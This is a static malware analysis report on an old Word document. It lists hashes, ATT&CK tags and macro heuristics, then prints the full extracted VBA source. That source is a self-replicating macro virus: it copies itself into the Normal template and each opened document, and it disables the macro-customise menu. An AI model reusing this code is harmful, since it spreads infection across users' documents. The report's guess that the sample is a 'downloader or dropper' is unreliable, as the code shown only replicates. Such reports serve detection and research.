Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 feb69a112434e677…

MALICIOUS

Office (OLE)

28.5 KB Created: 1997-09-17 03:18:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: a283c687dd0db3cc7ce3cea28081f875 SHA-1: 793e67bbf8cde93fa4cf1dbf9e6298a0c26b6e6c SHA-256: feb69a112434e67751be03ec59c01410b09096fd4e23b6a5ec019f408cdc178e
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing both AutoOpen and AutoClose VBA macros. The AutoClose macro attempts to copy itself to the NormalTemplate and the ActiveDocument, indicating an attempt to establish persistence or ensure execution. The AutoOpen macro simply calls AutoClose, ensuring execution upon document opening. The presence of these macros and their self-propagation behavior strongly suggests a downloader or droppper functionality, though no specific payload URLs or hashes were extracted.

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1460 bytes
SHA-256: dec6953b17c7d18ffed92cf95788a7b53d2c356b74272d2dcbf1a4fc988df1bf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Модуль1"































Sub AutoClose()
ActiveDocument.Save
'On Error GoTo 10
'Application.OrganizerCopy Source:=Word.MacroContainer, Destination:=NormalTemplate.Name, Name:="Модуль1", Object:=wdOrganizerObjectProjectItems
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents.Item(i).Name = "Модуль1" Then
installn = 1
Exit For
Else
installn = 0
End If
Next
For t = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents.Item(t).Name = "Модуль1" Then
Installdoc = 1
Exit For
Else
Installdoc = 0
End If
Next
If Installdoc = 0 Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Модуль1", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
If installn = 0 Then
Application.OrganizerCopy Source:=Word.MacroContainer, Destination:=NormalTemplate.FullName, Name:="Модуль1", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
End Sub
Sub AutoOpen()
AutoClose
End Sub
Sub Tools_Customize()
MsgBox "Error"
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.